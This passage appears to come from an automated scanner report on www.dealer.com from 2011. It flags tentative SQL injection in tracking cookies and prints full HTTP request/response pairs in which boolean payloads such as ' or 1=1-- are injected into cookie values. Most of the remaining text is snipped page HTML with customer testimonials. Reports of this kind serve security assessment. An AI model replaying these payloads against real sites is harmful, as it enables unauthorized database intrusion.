</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service
...[SNIP]...

Request 2

GET /media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; exp_last_activity=1303002163; exp_tracker=a%3A1%3A%7Bi%3A0%3Bs%3A5%3A%22index%22%3B%7D'%20and%201%3d2--%20; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.1.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 19932
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:03:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303002239; expires=Mon, 16-Apr-2012 01:03:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>I&#8217;ve had access to other people&#8217;s systems, so I can honestly say that Dealer.com is by far the easiest to for the end user.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The number of visitors has doubled since we went on board nearly a year and a half ago.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFl
...[SNIP]...
1.9. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./showcase/featured-client/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./showcase/featured-client/ cookie appears to be vulnerable to SQL injection attacks. The payloads 44053558'%20or%201%3d1--%20 and 44053558'%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./showcase/featured-client/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=144053558'%20or%201%3d1--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20268
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003558; expires=Mon, 16-Apr-2012 01:25:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Throughout my first few years here, researching and developing both a website and the Internet Sales Department for this dealership, I have used several nationally known Internet Service Providers (ISP). Dealer.com ended up the clear winner for more reasons than I &#8230;</p>
   <cite>Mike Poulin, Shearer Pontiac Cadillac Hummer</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Our sites perform better now than they ever have. Our dealers are very happy with our performance. Everyone&#8217;s extremely pleased with Dealer.com.</p>
   <cite>Cassie Broemmer, Van Tuyl Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>In the 2 years that we have been with Dealer.com, our rankings have drastically improved, and our lead volume has gone up at least 40%.</p>
   <cite>Alex Jefferson, Proctor Dealerships </cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/#sem" title="TotalControl DOMINATOR Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/TCD_Grey.jpg" alt="TotalControl DOMINATOR" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=144053558'%20or%201%3d2--%20; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002857; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A1%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3Bi%3A2%3Bs%3A26%3A%22%2Fshowcase%2Ffeatured-client%2F%22%3Bi%3A3%3Bs%3A6%3A%22%2Flvlc%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.42.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20146
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:25:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003559; expires=Mon, 16-Apr-2012 01:25:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>We wanted to be a true eCommerce portal and other providers weren't able to do what we wanted. After searching, it was a complete no-brainer. Dealer.com has all the capabilities we needed.</p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We depend very heavily on the SEO team at Dealer.com to ensure that our goals are accomplished as it relates to where we show up in the search engines.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Dealer.com has lived up to every one of their promises.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Everyday we are told about how great our site is and how easy it is to get information from. We recently started a billboard campaign called "Shop in Your Underwear at Stevebaldo.com" to capture the majority of customers already online doing &#8230;</p>
   <cite>Sheila K. Snyder, Steve Baldo Dealerships</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was very important to find someone with a suite of products that could not only help us today, but could help us in the long term.</p>
   <cite>Jana Kusin, Gillman Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/websites/mobile-sites/" title="MobileSites Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/spotlight-mobilesites1.jpg" alt="Mobile Websites" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealer
...[SNIP]...
1.10. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./ cookie appears to be vulnerable to SQL injection attacks. The payloads 14922819%20or%201%3d1--%20 and 14922819%20or%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=114922819%20or%201%3d1--%20; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20152
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:18:59 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003138; expires=Mon, 16-Apr-2012 01:18:58 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>People do ask me quite a bit, &#8216;what website provider will best help me with my search engine marketing and optimization?&#8217; I tell them the first thing they need to do is talk to Dealer.com.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>It was important that we aligned ourselves with a company that&#8217;s predicting the future.</p>
   <cite>Alan Krutsch, Walser Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/websites/videoblog/" title="Video Blog Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Video_Blog.jpg" alt="Enhance SEO with our video blogging tool" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_1.jpg" alt="Recapture lost customers & Increase Service Revenue with Service Marketing" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com
...[SNIP]...

Request 2

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=114922819%20or%201%3d2--%20; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 2

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20181
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:19:00 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003139; expires=Mon, 16-Apr-2012 01:18:59 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>With Dealer.com, we continuously improve and advance. We added video to our website this year and doubled the average time people spend on our site.</p>
   <cite>Rich Somers, ecommerce Director, Toyota Scion of Scranton</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>From technology, to innovation, to support, I've had an extremely positive experience with Dealer.com.</p>
   <cite>Andrew DiFeo, Hyundai of St. Augustine </cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>At Dealer.com, Internet Marketing is their passion. It&#8217;s what they live and breathe, so we know that they will be on the leading edge.</p>
   <cite>Dan Boismer, Suburban Collection</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>Since we've had a Dealer.com website our traffic has increased, our conversion has increased, and our website ranking is great. If you Google &#8220;used cars in Denver,&#8221; we are always on top.</p>
   <cite>Mike Mattingly, Internet Sales Manager, Budget Car Sales</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>There is one system I can log into to access all my tools.</p>
   <cite>Mitchell Brenner, Precision Acura</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
   <a href="/products/online-advertising/search-engine-optimization/" title="ManagedSEO Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/ManagedSEO.jpg" alt="Ranked higher in the search engines with ManagedSEO" /></a>
</li>

<li>
   <a href="/products/inventory-marketing/carflix/" title="CarFlix Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/CarFlix_3.jpg" alt="Increase conversion with engaging videos with real human voices" /></a>
</li>

<li>
   <a href="/products/online-advertising/#service-marketing" title="Service Marketing Spotlight"><img src="http://pictures.dealer.com/d/dealerdotcom/uploads/ads/Service_marketingtile_
...[SNIP]...
1.11. http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif [com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.dealer.com
Path:   /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif

Issue detail

The com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie appears to be vulnerable to SQL injection attacks. The payloads %20and%201%3d1--%20 and %20and%201%3d2--%20 were each submitted in the com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/ cookie. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.

Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.

Request 1

GET /products/lead-management/call-tracking/media/uploads/page/media/uploads/page/loading.gif HTTP/1.1
Host: www.dealer.com
Proxy-Connection: keep-alive
Referer: http://www.dealer.com/products/lead-management/call-tracking/media/uploads/page/loading.gif
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.204 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: ssoid=60f9d9d10a0a00ed0114d7394bf06e06; exp_last_visit=987642161; __utmz=161351586.1303002182.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); com.silverpop.iMA.page_visit./=1; com.silverpop.iMA.page_visit./solutions/franchise-dealers/=1; com.silverpop.iMA.page_visit./products/online-advertising/=1; com.silverpop.iMA.page_visit./products/online-advertising/search-engine-optimization/=1%20and%201%3d1--%20; com.silverpop.iMA.page_visit./products/websites/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/=1; com.silverpop.iMA.page_visit./products/inventory-marketing/epricer/=1; com.silverpop.iMA.page_visit./blog/=1; com.silverpop.iMA.page_visit./company/events/=1; com.silverpop.iMA.page_visit./press/=1; com.silverpop.iMA.page_visit./company/awards/=1; com.silverpop.iMA.page_visit./company/history/=1; com.silverpop.iMA.page_visit./blog/2010/06/=1; com.silverpop.iMA.page_visit./lvlc/=1; com.silverpop.iMA.page_visit./press/dealer.com-wins-2011-diamond-awards-for-website-design-and-internet-trainin/=1; com.silverpop.iMA.page_visit./showcase/featured-client/=1; com.silverpop.iMA.page_visit./products/lead-management/=1; com.silverpop.iMA.page_visit./products/lead-management/call-tracking/=1; com.silverpop.iMA.page_visit./products/online-advertising/powermail/=1; com.silverpop.iMAWebCookie=1b371563-da21-14c5-db4d-407b95beb159; com.silverpop.iMA.session=20a481a9-716c-08d8-9179-6804e373028e; exp_last_activity=1303002983; exp_tracker=a%3A4%3A%7Bi%3A0%3Bs%3A30%3A%22%2Fproducts%2Finventory-marketing%2F%22%3Bi%3A1%3Bs%3A39%3A%22%2Fproducts%2Fonline-advertising%2Fpowermail%2F%22%3Bi%3A2%3Bs%3A40%3A%22%2Fproducts%2Flead-management%2Fcall-tracking%2F%22%3Bi%3A3%3Bs%3A26%3A%22%2Fproducts%2Flead-management%2F%22%3B%7D; __utma=161351586.382883849.1303002182.1303002182.1303002182.1; __utmc=161351586; __utmb=161351586.47.10.1303002182

Response 1

HTTP/1.1 404 Not Found
Server: Apache
imagetoolbar: no
Content-Type: text/html; charset=UTF-8
X-DDC-Arch-Trace: ,HttpResponse
Content-Length: 20220
Vary: Accept-Encoding
Date: Sun, 17 Apr 2011 01:20:58 GMT
Connection: close
Set-Cookie: exp_last_activity=1303003257; expires=Mon, 16-Apr-2012 01:20:57 GMT; path=/

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <title>404 | Dealer.com | Car Deal
...[SNIP]...
<p>I don't care who your website provider is, if it's not Dealer.com you need to at least take a look at them. I give them my absolute whole-hearted endorsement. I put my name on it. </p>
   <cite>Mike Nazworth, BDC Manager, Heyward Allen Toyota Scion</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>We were looking for an all-in-one solution&#8212;one company with expertise in all the different fields. That is why we chose Dealer.com. </p>
   <cite>Roy Rueter, e-Business Director, Sheehy Auto Stores</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>Whether you are 1000 miles away or whether you&#8217;re 100 miles away, you really feel that you&#8217;re part of this Dealer.com family.</p>
   <cite>Christopher Della Bella, D&#8217;Ella Auto Group</cite>
</blockquote>
</li>

<li class="odd">
<blockquote>
   <p>The backend administrative system is just so easy and fast to use.</p>
   <cite>Greg Nalewaja, General Manager, Metro Honda of Union County</cite>
</blockquote>
</li>

<li class="even">
<blockquote>
   <p>One of the benefits of Dealer.com is when you manage a whole group, you can log into ControlCenter&#8482; and easily toggle between all stores. It&#8217;s seamless!</p>
   <cite>Kendall Burger, Hansel Auto Group</cite>
</blockquote>
</li>

        </ul>
   </div> <!-- end .first -->
   <div class="group">
       <ul id="ads" class="cycle">
                   
<li>
